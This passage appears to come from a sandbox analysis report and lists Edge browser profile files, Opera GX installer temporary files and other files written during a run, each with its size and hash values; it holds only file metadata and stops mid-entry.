                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                2e1a2cf7965700e785c2069eefcc2553

                                                                                                                SHA1

                                                                                                                9697b16874aa5bf1f728b829d477083b416f4ec6

                                                                                                                SHA256

                                                                                                                61ee270076cf4090a30f739ba936ab21aa1b1d84e7c6968fa7c33ea3220a7c38

                                                                                                                SHA512

                                                                                                                12fed74ce1555c7002ddd2d2e9e708bcaf4ebc0a1f6c414302cad726a763d21333eeae54520f1469d63874c8790b823320300f0cc87cf54e83e151cc7c614ea1

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                                MD5

                                                                                                                bcfab800d987f23b3065f5651edf80e1

                                                                                                                SHA1

                                                                                                                059fe259d2308741c9b1af7855f1cfaf056af88b

                                                                                                                SHA256

                                                                                                                6ec49da8beb4858302b040ea4216e4c21366c34216869436c5ae5feaa0bdf676

                                                                                                                SHA512

                                                                                                                ed61f793f7534d77c22eccf5e81b6183c9f92822a2d363b652b544d1317f62204279b733b10d6ac77ddf94717d030d9075033f7bcdda52f5cb4e9b45b645e8dd

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                                MD5

                                                                                                                6103072d3b870d0b61cb35d37bd00906

                                                                                                                SHA1

                                                                                                                95e2beecfb3a40ae3285ff2a0370e849a4e78e9b

                                                                                                                SHA256

                                                                                                                6fcb1f893f0376d2641ab89bd0e3b30efc47f30e68045c287e65b65d68ab81cc

                                                                                                                SHA512

                                                                                                                5372500512b10cceae9cd1fa42cea9340d7d7af5d7c67f3facf6da9b7f635a565a32f93a3907f5a34eca9fad91950d8f67da51d355dc04ac9903cdb50cfbbbb8

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                                MD5

                                                                                                                39688c4c85c4370d89bb786e44846bad

                                                                                                                SHA1

                                                                                                                21f695a6a17b909bc068531390ba73bc4f5e5ecb

                                                                                                                SHA256

                                                                                                                62090a14cbab550b81ed14bfe6a3becaee8ccb34a4f4816f4a7e12aaa30bfc01

                                                                                                                SHA512

                                                                                                                d6b4302dd15ff8dba1f3202aa7c8503ba79c8fc45cf1bbea6345096b7b35d2efdcafb4726b2b7d1bf29093ba4cff9f5469452fed93ea1b0b2ef04c70ba739520

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                                MD5

                                                                                                                dc6991c84fe8a12aa0e6763767bcc863

                                                                                                                SHA1

                                                                                                                a768e6e1ff4c0dcd014c0ea4ca97089ee7736a8b

                                                                                                                SHA256

                                                                                                                937bab76327baa5c5fdad5d920a9d7baa99d2680a91a3be0eb11194947070f88

                                                                                                                SHA512

                                                                                                                be4ee6ad3f84f1a45a0b8a0dc4e8fb44347ba2a122f9428ebf520b846f66203b88d2843d2604900e87b31089d7d0e93acacc80c4573447f2b5ba8dffd7a216c0

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                e259a8853d83b89fa0d477bf6e4e1027

                                                                                                                SHA1

                                                                                                                8c399ac0c26ebfcb9d24aad1644fa44fabfb8680

                                                                                                                SHA256

                                                                                                                353dadb5409a1152694a782a517bc6c03b9603593868e941eb2992f380b28265

                                                                                                                SHA512

                                                                                                                a039059e621bb46004e8050ccd8b648677e52f7706745a30458654d2fd6aa0760c64c801e39ee86e99076747be6e39df37e72c0e644d2d16e07ddbf77a69aab0

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                f1c0778f0cfc7d0bd48b4eaf82248d46

                                                                                                                SHA1

                                                                                                                efe07aa344420ed5691fed0d50d8931f556dd40c

                                                                                                                SHA256

                                                                                                                d7e4ee6933d80e86b1c28998c5b55a3ec59cc87ad42372b4ff04e433b29bf7ce

                                                                                                                SHA512

                                                                                                                7387d6304e34f8f08653c3af76abc34e33be582a993dd7e3d1c8d020121862c9863e53ac978ef667d328cafb8fecc4fcbe16ea361396722abc2320e29e69ca91

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                34e3ecfbc81024054900d77c8fc16c0d

                                                                                                                SHA1

                                                                                                                de6ce5b38358a678ea7bb9ff21eb6561f80434ec

                                                                                                                SHA256

                                                                                                                14363879c7f7029a4de37f53edd6816bdf0d12a2ecd67ff6bbeefde90100792c

                                                                                                                SHA512

                                                                                                                4127361cf86dd552c9051b9c95e7aaa0b03bb4bdbf0bed096b21f19ee8d24c2ff7ecfb5fb770d9847c2e38571f0ff0495e1b29e19884f881b07d2b2908e31d59

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                507b981f508496d7102042adfd94fb8c

                                                                                                                SHA1

                                                                                                                95260fa1731a56c9b72adb50da46594e87a4cb69

                                                                                                                SHA256

                                                                                                                34e3fe4b6c2ac34c2db1919ae1f0519c102c0e067dabb97d81d53e42004fc940

                                                                                                                SHA512

                                                                                                                b70e7456964ba01c7a0aea23222ff1c6214cd3e614a8f0dba08113e3d80634fc3c741f6002041de44bd876550e4658002741eaa45e083ad8f1875a123d325d80

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                33e0cda7bdd3c0dba5c50c39451528e3

                                                                                                                SHA1

                                                                                                                0b8390c78b7db7049bc73d49f15c49a68659baf9

                                                                                                                SHA256

                                                                                                                32941b7e9750a380e5d2851d649c7d062f4dee8ea9ca089e49ad075f637a0469

                                                                                                                SHA512

                                                                                                                baabfd11aec9ac150ec6a4ad2cb065d1a4039b9a74a77e010bfacc40966caab8dd2e96f904c1cfd5e02acbee99c573c69437e77c77d320fb8f59828a695fbf04

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                1a642406ae91efb3cf018c5d35131cc0

                                                                                                                SHA1

                                                                                                                43b29d7f7f97cde71f035b0a027476a7a3878eea

                                                                                                                SHA256

                                                                                                                bcb6a687b15ce4c52a8a5fda118a2856c8ab9955a0e0f06b2bd7648a0b0ee09e

                                                                                                                SHA512

                                                                                                                e8a302b53b58d862111bd0807ca3a9592d7c2b7c87b481d91134ae394c7af9cc66d6bd93c921602ddfda99e50a8b476d5f5c3e7bab8e993f1e21b723b1a2f592

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                                MD5

                                                                                                                577deb636a26a11f257e5e2067b5d1bb

                                                                                                                SHA1

                                                                                                                283ca2957148b7ce17a81eb8899f49a420ba1994

                                                                                                                SHA256

                                                                                                                61e53665865db00708614d1e102d43cc3e9b84bcdfc203a55b8a3e4bae31c6dd

                                                                                                                SHA512

                                                                                                                42b1879bb9b30c27183783d63975e40f8cd8860b7aeb9204233b57e16a8c438045d8d7ce34827324094f6aeada510c768e8b956ad3b9473f0e2a64502498c06a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                884fdbf9d975b15326ad2f9c82450360

                                                                                                                SHA1

                                                                                                                f5d0e2565e72f03ff74699c30d080f8e815b07a1

                                                                                                                SHA256

                                                                                                                211dc584f35a68cd670ff2cbdb18d4fdac2524002d7abfd4d5ca270a476b2dc1

                                                                                                                SHA512

                                                                                                                8ad911fd820addf92c79a07d4ccd70f0ab2455c2b62edada7ea04bf3c3176ba5023709c9812571e3db49d0c71ceab2d8cc531968312300fa2297757ef39764a3

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                                MD5

                                                                                                                e6c96450571e2cd70b640872b7071c14

                                                                                                                SHA1

                                                                                                                9eadb7185ec1f3ce3a5113d1cfb323c9bb84dd99

                                                                                                                SHA256

                                                                                                                17af746d90c0efb4c24f587578bee9aa3680b53abe1ef7dc27d19558fd11592b

                                                                                                                SHA512

                                                                                                                c84afb347bd0ee973793d365cac2edc426dc3ed726cb9eac7e1af74bfeb546942838027af9123da4cf0759e34672e9e84f192cc2c2ac20a3ea31e9679569f511

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                                MD5

                                                                                                                e48311e38212ef537ceeba8c4d56612b

                                                                                                                SHA1

                                                                                                                8474f0e4d0c73cb8ceeb2321b3667cc9b34cdeb3

                                                                                                                SHA256

                                                                                                                f785e9778e7da3313777873e70e643c0dc45233fb250116ea66ac58ab36c9e33

                                                                                                                SHA512

                                                                                                                7d1ce49416afcd4eaa1c9c34a5f0093daedff3bc663107d6455cf134b8d3e709b2962f80a98b354dedb173b3dae8cb2c7f1ec0e08eeaaf7417b55a737a8fe5dd

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                                MD5

                                                                                                                b7f6d41c0bf6858b0cc187155da64578

                                                                                                                SHA1

                                                                                                                682ab9d8bcf3004cab080077c20668597e7e6a7b

                                                                                                                SHA256

                                                                                                                3d874cbc8ff710965038605b180d249e948aec051c65c03946a06e119f1d1f5e

                                                                                                                SHA512

                                                                                                                d4d7c732836f7106ec7830256900a85c3157d89f716348dd56856e3de689ecaffe9960ccd01b2543a9dacdc60e6e23782e66918533257250751df194e393412f

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                                MD5

                                                                                                                87f466927ff938fe302c337b069f12c2

                                                                                                                SHA1

                                                                                                                48e62cffc623afc32c33cf7ead45a53ee06c4f94

                                                                                                                SHA256

                                                                                                                a37c2bdc930777f5782d40486c5d75e0529f8ba0ced208879ff0ff527e9be8d6

                                                                                                                SHA512

                                                                                                                07f5918a9a724a528c39b1743b6edb7bd199bc808c2d9540219e92d52e1ee89498647ebaed85733e8d35cb859f701ed7c2b7eb8c90ce6b09bd36ce22f991a5bb

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                19b58916382a04e0f4d8ba38f314cb54

                                                                                                                SHA1

                                                                                                                df30d7eb068b99931b47945aecb2761d726fd422

                                                                                                                SHA256

                                                                                                                85da4b615aac5a8fd210195f1c6aa210f1b34118d3229b666ec4fbd9fe850fff

                                                                                                                SHA512

                                                                                                                b2cfbe9e0b0d734f1e86945f7b4d9a3ddf373103595cd7ac909571a2710376f0385f7bb94d91ebe7b19bf943241a82812dd33b74aeccd52e65b8a5346339abab

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                                MD5

                                                                                                                a3b9d66c78df6108d962eda1abbed062

                                                                                                                SHA1

                                                                                                                8d78b4359e51b6a6ef3c6be12db2591851b2e526

                                                                                                                SHA256

                                                                                                                79c3524f2cc948e83bcbb0a6bf955208570a2e1ced6353f9f5084a6fce09fd40

                                                                                                                SHA512

                                                                                                                e0cf7c1ececded126f25f119c81851f7109f37a8585b40bc148fc9ca17a0935be6e52f28db7f3eceb17050519179827f0c2c68aceb37814a3567c4b70223b796

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                                MD5

                                                                                                                dc34032a471a268d6b8354a73ea38d6b

                                                                                                                SHA1

                                                                                                                91b0acb589925452638fdc0c323a11ad96f2ce22

                                                                                                                SHA256

                                                                                                                7e459df276fe8df5166fbc178de9612e6347400c9b4b97792741ae574dc190eb

                                                                                                                SHA512

                                                                                                                9460a7dc363655093039fc9ade5783c95afa720a32f267205208f51b992daf00773309c10035f11c8dab7c3ba9dfa116c356b895fadb691ced88896a1efffcc5

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                b2c8afb8d1e4a3872a861012b4d13b29

                                                                                                                SHA1

                                                                                                                f213620d21a6884b047fbe8e6584180ac898dc59

                                                                                                                SHA256

                                                                                                                d48ca5855cbfb5f4b403cfe8b9041849488e65574907590c19a5816fa482b9c8

                                                                                                                SHA512

                                                                                                                86b97a5623c56cc1649ccf0820cbe100d0cce5a7b38a4b1a9f15e4dfb18f944d96ed3c1f787aa1fefc678d3968e958b9c452672e38a7c2f26d7e7f37513d8e57

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                220dc36ff4e760d5e995fa96edabbe26

                                                                                                                SHA1

                                                                                                                5e612426d3f08ffdf194c8e70fbd67abc3988360

                                                                                                                SHA256

                                                                                                                8779dc0c2c6b3c38839a007e37dc97f1f570458f76a005806befd5a34d018742

                                                                                                                SHA512

                                                                                                                a40b449327bc6caff9ba8991fc171941d2f182cfc9856d0f2d67cf1a92e54ebb97d58cbf4e1f9c7a4e6c7578bd324a3b017f9459fae959fd677892c0c3b1b707

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                ddb39be8cf9b2600226b46693b460e46

                                                                                                                SHA1

                                                                                                                16a385389f9cdd0a52a10454775eb057e9c9a44d

                                                                                                                SHA256

                                                                                                                5afd08e8d75f25a5c19c22b1a1994ebcb46a10b464faf18d849597194c5aaccf

                                                                                                                SHA512

                                                                                                                60fb99856c88c5c2f74dd0ac0857912fcd278266c33db77142c6551b38fcf80f6fa0f14833949c32bd608224ba35f08840bdb4e36a8e30eb401808039841784b

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                075c7e5389c77958b8fe0a0a9731bf6b

                                                                                                                SHA1

                                                                                                                ec82c10ad2f3571046ff9e323e07f272920fd6d6

                                                                                                                SHA256

                                                                                                                d0ce2676ee3a4a618d5aa53d89468d8b4dace8d02eca2dcaef47cbc646c85727

                                                                                                                SHA512

                                                                                                                ffc8ed1f57dc0ca963e29ec0bff62bb46ece6694d42416411b5e4915ed1fe6c943c66ee3b1086d3c7fa506444fc09014c24bf645e4491aed54f5a8854c6fa6e7

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                MD5

                                                                                                                06723ec616fb444c2d8a719f4a4cc2ca

                                                                                                                SHA1

                                                                                                                3dd3f98fae19383ae680f29608e403e3098007c8

                                                                                                                SHA256

                                                                                                                b7e3f712353f5ebe8f4a43bbba4666b398818c6d44aceecf5ad6c748698b21a9

                                                                                                                SHA512

                                                                                                                4018bedabfb9ce4e02ce9276a29d4a50601c92928e8ec67d4616b323f4c285eeb86f192fee7bf73f27b88c73d72fe417deb4c782cd48a874d56b59e0e7d13c93

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                31caca17122c63dd9023cb69c232b190

                                                                                                                SHA1

                                                                                                                ea33a53f56c62e06d092b9a8e9297a984bb31ffa

                                                                                                                SHA256

                                                                                                                abe4528cc931b4c0ae473a4977378a1845bd5c3f7b4c3cc9ab57b13f7ea67b09

                                                                                                                SHA512

                                                                                                                bfc5227d22836d6d6267070bb2ba6bb88f6e69bc99974c68e807a8c9c979e695af62fff9048f48fe8e97f86322a7eec0ce04e1cb4079cbf53d7fb20a086380a5

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                e1c1cf8949fbd0fab8726696e172bc85

                                                                                                                SHA1

                                                                                                                c2500dbe5df39c99368c5e5cb81a7edac852bbd2

                                                                                                                SHA256

                                                                                                                1b3c6852e4ea816b7c2510722c565781b33a80fa6b58dc5cca924753fe67232a

                                                                                                                SHA512

                                                                                                                f7a0991b0379079a0a11b5e9e78f185a9c3f876e0275595a1bd965107e3401b74e3b7fcc4e4bae3402fbef2d2ce58add160fbf3ca92b3a3904c58230a8b21536

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                4605c8d6a4a125a938415b1399ed6b8d

                                                                                                                SHA1

                                                                                                                7534193a50af2388785ed8622ebd91338abe0719

                                                                                                                SHA256

                                                                                                                f89cf9e00b3c31caae5aaa14391b9fb732359269d14dd88cc643713e6817333b

                                                                                                                SHA512

                                                                                                                56da139a0bd2db8576fdbae4eacbb9262779e62ce7c0ab5fed84f48eb01c697bab20147f71983788ba383490a78152d61fb488d9ea96b1ee23cbdf38b8efa437

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                                MD5

                                                                                                                72408f61735296d6fbec4db2ba152f7c

                                                                                                                SHA1

                                                                                                                b43326269401223d99d8ba344df531ae43e891d6

                                                                                                                SHA256

                                                                                                                613d237866326f266f3a50585bb8045bd6877d46b195797d7b17b51144034b0e

                                                                                                                SHA512

                                                                                                                90dabb39d8bb081a4c37c96517d7e12dea14446ca3f7d6951da7ee61580926917c2ab147957f7db39f89eb96a7c45fb6a9c6683a2553515ca5ce214d8658c60f

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                                MD5

                                                                                                                5ecdff0cabcb28bf1b3508f55a71b42f

                                                                                                                SHA1

                                                                                                                8469f283fca8acdb5605f8f2bc7ed0d7dad1cd20

                                                                                                                SHA256

                                                                                                                5da53f9520c8f1356e770c85a8b15ad5a34aebfe6bb566fd7152bbd5514622d3

                                                                                                                SHA512

                                                                                                                9e18b20aec35a28e7a50c2cf1acfde0c2508c832d985be018dc3f9c7aaa5abfd88bd2006d7f412e2f10c19ffdb49a305e308e983168eda224dc70df8d83fa41b

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582575.TMP

                                                                                                                Filesize

                                                                                                                540B

                                                                                                                MD5

                                                                                                                8872f4f1e8ce3ad5109fcde2887ace99

                                                                                                                SHA1

                                                                                                                0aa7a5b6f83fb8caabd4c7872c5765b6e4a6a574

                                                                                                                SHA256

                                                                                                                7d5a96a27bc8821a8962379a2ea99dd69ab677b0281b7ea54ded820185b95f97

                                                                                                                SHA512

                                                                                                                ef8f28743aa40d5405806723abd505926ee3f50445f0aa1f8b98a70ab57e75141e8c2b8c4267615d70f689a1444014df01ab97864be1438572e56db7fefaaf4a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                Filesize

                                                                                                                16B

                                                                                                                MD5

                                                                                                                6752a1d65b201c13b62ea44016eb221f

                                                                                                                SHA1

                                                                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                SHA256

                                                                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                SHA512

                                                                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                1d9939e48e827c7bc76bdf9107e42f6e

                                                                                                                SHA1

                                                                                                                e67cf679e83a0ef7aedb8808a3749be691e5f734

                                                                                                                SHA256

                                                                                                                d9c272456cd4b727dc3eb045a16cee0b31723fdc132308ffb6090429e87950bc

                                                                                                                SHA512

                                                                                                                272bd872b364fa55a35d0e7ad7829b7db04b702f8eca1a5e7afe6510b51f9f2a4f13db4d2d25535a08300bc2d0e91c82d38813b9b5a83e969d45252281acae13

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                4942d274a176bdeb42944f0b394db5d1

                                                                                                                SHA1

                                                                                                                11682add788e97736aaf4610e953c314b3a41db3

                                                                                                                SHA256

                                                                                                                e4298720d6d83f58b2e5a2756d6f54a0fc80d0c814446f0aa8b78fa9090c7806

                                                                                                                SHA512

                                                                                                                e091a68478ecbccf47a518ff063420c989318dba3bc80b892e0dcd43fefd9394ab1dc50c1bf55cc2b2b95b615b17c41b99ad63ffb49b221003f8a5852b902bb2

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                023068b4ab0ebb96786f810db37e4b47

                                                                                                                SHA1

                                                                                                                c89c663ae89bc0d571a896f1dd3b004960a49b98

                                                                                                                SHA256

                                                                                                                d2cebd99a6dc92bdf1c9fe6fbe754d703b1e6216b995d90567faeb368ca1a1d0

                                                                                                                SHA512

                                                                                                                47541062204e1adec1a11c8237a79c8d24221f0ba523d908b1c56be2dab45c6328dbf3e36f93314ba7d3178be01bb7164626c3319717c25d274ac078fac84e54

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                de65e67dafece201254a451edf018638

                                                                                                                SHA1

                                                                                                                d12754aecfb2710e3fcc84985f83bb6671918f19

                                                                                                                SHA256

                                                                                                                07d95465a1a4ff1ce7668a6cfd57fe83cd20f6450361562803235064732f6348

                                                                                                                SHA512

                                                                                                                89d87af74f42405bb72540ab3ae21b838d8c07ac1d8a54e4b92ac5dd5d1791f1fa900dbc7d037dca7fa69f0412f35073136ba1ae7c80c01ce6753631b1c94653

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\additional_file0.tmp

                                                                                                                Filesize

                                                                                                                1.4MB

                                                                                                                MD5

                                                                                                                e9a2209b61f4be34f25069a6e54affea

                                                                                                                SHA1

                                                                                                                6368b0a81608c701b06b97aeff194ce88fd0e3c0

                                                                                                                SHA256

                                                                                                                e950f17f4181009eeafa9f5306e8a9dfd26d88ca63b1838f44ff0efc738e7d1f

                                                                                                                SHA512

                                                                                                                59e46277ca79a43ed8b0a25b24eff013e251a75f90587e013b9c12851e5dd7283b6172f7d48583982f6a32069457778ee440025c1c754bf7bb6ce8ae1d2c3fc5

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe

                                                                                                                Filesize

                                                                                                                1.8MB

                                                                                                                MD5

                                                                                                                4c8fbed0044da34ad25f781c3d117a66

                                                                                                                SHA1

                                                                                                                8dd93340e3d09de993c3bc12db82680a8e69d653

                                                                                                                SHA256

                                                                                                                afe569ce9e4f71c23ba5f6e8fd32be62ac9538e397cde8f2ecbe46faa721242a

                                                                                                                SHA512

                                                                                                                a04e6fd052d2d63a0737c83702c66a9af834f9df8423666508c42b3e1d8384300239c9ddacdc31c1e85140eb1193bcfac209f218750b40342492ffce6e9da481

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe

                                                                                                                Filesize

                                                                                                                6.3MB

                                                                                                                MD5

                                                                                                                eb798e91d503b97614756193e195a7b1

                                                                                                                SHA1

                                                                                                                06367f70a0b4c6de9e208c419beb84fa10c0eeef

                                                                                                                SHA256

                                                                                                                406b5edbd94bc38ce345d3c0f34b6b5fcd0405bd290a2ad0fd55c08b0695eed8

                                                                                                                SHA512

                                                                                                                5738431f355f599e88ec8b603f692a23a779ef41183ee1ebad3f7c81a9296a3df626d852cca1256791cc665d912f8f73c4ac00a15e4f96259c253290a40ba020

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2409132038163015896.dll

                                                                                                                Filesize

                                                                                                                5.8MB

                                                                                                                MD5

                                                                                                                d9566efedb5ea286e12826594a40e623

                                                                                                                SHA1

                                                                                                                eba69b688be145e73103ec9587db22e072ee9fb5

                                                                                                                SHA256

                                                                                                                d09af4042577f9c1c72863df791b0114d25086cbf9fa3012b765157ddcbbdf33

                                                                                                                SHA512

                                                                                                                daa4adc5f254088d3b8d22d27b5af3d3663630017903f64377579cba46c0b8e4ffa427b7e51ccdc214e70ed835e2ff9ec2baf4a28a194a1c22dd2ee2abf653bb

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trvcpbew.52d.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                                MD5

                                                                                                                afb70b6cab0efd1a3227a3fbaeca79e8

                                                                                                                SHA1

                                                                                                                4014ec0f1584efb3221e28136f8307dd35bb920d

                                                                                                                SHA256

                                                                                                                467de42ea470c4a2ac60fa4592cec7b7f9a931da4f1c8e6b2529a8d1ff96adc3

                                                                                                                SHA512

                                                                                                                37f8c670ca888a703844f76b34bb1c6553e63091cea38b4700ba6042a3dc969d8b3735110fdd1a43e80d29ecf3e7b6c7456d8924aef9ea2b0355607379915ad7

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                992e35365caf33bcde19086c01dad5a3

                                                                                                                SHA1

                                                                                                                cc2f3e1851263271078c2aca6f9e9d413435029f

                                                                                                                SHA256

                                                                                                                3eba4f8e123b5eb377f0ec66240fd0965208e8292fb96cdea7b2fe4a7aa71850

                                                                                                                SHA512

                                                                                                                30a188372b0d17b6a8cc6227657c53ed3b33432e1f3bd59604a0367b7b465d0a44a7a4204b0e8a04ae0a310409c8f57f16348a61235f470a5afb5de4262002b8

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                5c5f6805748dc3a686903ad72ca01cfb

                                                                                                                SHA1

                                                                                                                474a34945369537f0365af474c6d1cc6d4837633

                                                                                                                SHA256

                                                                                                                a9acf9c81ea5e9310b8ac99f8484ed9133c999501130aebd44b2e09737676c31

                                                                                                                SHA512

                                                                                                                cefc84d4f8c20d558f7a29a10e98917a0de71f8c10769e3e07e0328d87ce2c263fd74cf3babeec178c22dc8bd69ebf75987534dc3c896d8c7caedc7e12743215

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                                MD5

                                                                                                                e0f84e516d133180192674ebbc4332df

                                                                                                                SHA1

                                                                                                                ecb1f690eb8b0513f41a64a8b1a5375c885d6248

                                                                                                                SHA256

                                                                                                                366136133bf42bc80ecc0c7528824600f90dc392d9d8b2e95d2fd67aa50e0bba

                                                                                                                SHA512

                                                                                                                873efbd702541ce4e381a70c5b3d6926f537f41c63c671df151ef5185eeda551c9692c52aa748adf99801cffd8462d373a9126b63eecb73607b2e9e1b1ef79a4

                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports\settings.dat

                                                                                                                Filesize

                                                                                                                40B

                                                                                                                MD5

                                                                                                                235b32841f70bc239d5f0ba7b0c29acd

                                                                                                                SHA1

                                                                                                                b4adbd85481504f1907e480713f44c92366e90b2

                                                                                                                SHA256

                                                                                                                4acc251c83b7509af87b5649d73ec72f60427e50f5f39fb975506cba503a5936

                                                                                                                SHA512

